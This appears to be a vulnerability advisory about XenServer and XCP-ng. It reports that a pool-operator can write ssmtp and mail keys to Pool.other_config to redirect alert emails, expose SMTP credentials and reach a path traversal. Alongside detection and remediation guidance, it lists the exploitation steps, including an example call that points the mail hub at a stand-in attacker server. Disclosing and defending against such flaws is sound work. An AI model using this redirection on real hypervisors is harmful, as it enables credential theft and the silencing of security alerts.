MOKSHA-2026-0042: SMTP Server Redirection / Credential Exfiltration via Pool.other_config

Summary

A pool-operator in XAPI-based hypervisors (XenServer, XCP-ng) can redirect all pool alert emails through an attacker-controlled SMTP server by writing ssmtp-mailhub and related ssmtp-* keys to Pool.other_config. The mail-alarm script at lines 82-88 reads all keys with the ssmtp- prefix, strips the prefix, and uses them as macro replacements in the ssmtp configuration template. This enables SMTP server redirection, credential exfiltration (if SMTP authentication is configured), and recipient manipulation via mail-destination. The mail-language key is used as a filename component with no path traversal protection.

Vulnerability Description

Pool.other_config is a Map(String, String) field writable by pool-operator. The mail-alarm Python script reads multiple keys from this field to configure the SMTP alert system:

The code path:

1. pool-operator writes Pool.add_to_other_config(pool, "ssmtp-mailhub", "attacker.smtp.server:25")
2. The mail-alarm script is invoked on pool alert events
3. mail-alarm:61-63 reads all keys via get_pool_other_config()
4. mail-alarm:82-88 iterates over keys starting with ssmtp-:
   • For each key, constructs search_text = "@" + key[6:].upper() + "@" and replacement_text = other_config[key]
   • Replaces macros in the ssmtp configuration template
5. The ssmtp configuration file is written with attacker-controlled SMTP server
6. Alert emails are sent through the attacker SMTP server

Additional keys consumed by the alert system:

• mail-destination (mail-alarm:92-94) - controls email recipient
• mail-sender (mail-alarm:97-99) - controls sender address
• mail-language (mail-alarm:102-104) - used as os.path.join(mail_language_pack_path, mail_language), a potential path traversal vector

Root Causes

1. Missing RBAC protection. Pool.other_config has no map_keys_roles entries for ssmtp-*, mail-destination, mail-sender, or mail-language. All inherit the class default _R_POOL_OP.

2. Unsanitized macro substitution. The mail-alarm script at lines 82-88 performs string replacement using attacker-controlled values with no sanitization. Any ssmtp configuration directive can be overridden.

3. Missing write-time validation. No validation on the ssmtp-mailhub value (hostname:port format), mail-destination (email address format), or mail-language (path traversal).

4. Path traversal in language file loading. The mail-language value is used as a filename component in os.path.join() without sanitization, allowing potential path traversal.

Affected Systems

Directly Affected

• XenServer / Citrix Hypervisor - all versions (shared XAPI codebase)
• XCP-ng - all versions (confirmed on 8.3.0)

Indirectly Affected

• SMTP infrastructure - attacker receives copies of all pool alert emails
• Security monitoring - alerts containing host status, VM status, storage health, and HA events flow through attacker SMTP
• Credential security - if ssmtp is configured with SMTP authentication credentials (via ssmtp-AuthUser, ssmtp-AuthPass), those credentials are exposed to the attacker's SMTP server

Exploitation Scenarios

Chaining Analysis

• BOC-1 + PLOC-4: vm-admin uses BOC-1 S3 (RBAC collapse) to self-grant pool-operator, then redirects SMTP traffic to an attacker-controlled server. Effective minimum role with BOC-1: vm-admin.
• PLOC-4 + PLOC-2: SMTP redirection (PLOC-4) combined with HA timeout manipulation (PLOC-2) allows the attacker to suppress alert visibility while causing HA fencing events.

Detection

• Monitor Pool.other_config for changes to ssmtp-*, mail-destination, mail-sender, and mail-language keys
• Verify ssmtp-mailhub points to the expected SMTP relay
• Monitor outbound SMTP connections from pool hosts for unexpected destinations
• See rule PL-04 in disclosure/vendor-detection-guidance.md

Remediation

Short-Term Mitigations

• Audit Pool.other_config for unexpected ssmtp-* and mail-* keys
• Verify ssmtp-mailhub matches the organization's authorized SMTP relay
• Monitor outbound SMTP traffic from hypervisor hosts

Long-Term Fix

Protect SMTP keys via map_keys_roles. Add ssmtp-* and mail-* keys to Pool.other_config map_keys_roles at _R_POOL_ADMIN in datamodel_pool.ml.

Sanitize macro replacements. Validate ssmtp-mailhub as a hostname:port pair. Validate mail-destination as an email address. Sanitize mail-language against path traversal.

Use dedicated SMTP configuration. Move SMTP configuration out of Pool.other_config into a dedicated, access-controlled configuration mechanism.

Upstream patches exist. They are held privately pending coordinated disclosure.

Disclosure

Disclosure:

• Public release: 2026-04-24 08:00 CEST
• CERT/CC notified: 2026-04-23
• MITRE CVE reservation filed: 2026-04-09 (no response as of publication)
• EU CVE registers notified: 2026-04-18 (GCVE/CIRCL, ENISA, DIVD - no response)
• Vendor (Cloud Software Group / Citrix): not contacted pre-publication
• Downstream maintainer (Vates/XCP-ng): contacted 2026-04-23 with conditional patch offer

References

• XAPI source: mail-alarm:61-104 (pool other_config read, macro replacement, mail-language), datamodel_pool.ml:1764-1773 (field definition)
• Thematic advisory: disclosure/advisories/ploc-security-advisory.md (PLOC-4)
• Investigation: research/investigations/pool-other-config.md

Credits

Discovered and reported by Jakob Wolffhechel, Moksha.